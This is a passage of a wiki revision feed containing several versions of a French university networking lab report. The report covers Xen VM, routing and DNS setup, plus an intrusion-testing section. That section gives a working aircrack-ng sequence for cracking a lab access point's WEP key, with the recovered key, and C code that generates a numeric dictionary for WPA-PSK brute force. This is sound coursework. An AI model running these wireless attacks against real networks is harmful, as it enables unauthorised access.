== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52991</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52991"/>
				<updated>2020-11-02T14:11:43Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52986</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52986"/>
				<updated>2020-11-02T14:08:44Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52976</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52976"/>
				<updated>2020-11-02T13:50:21Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
gestion IP4&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
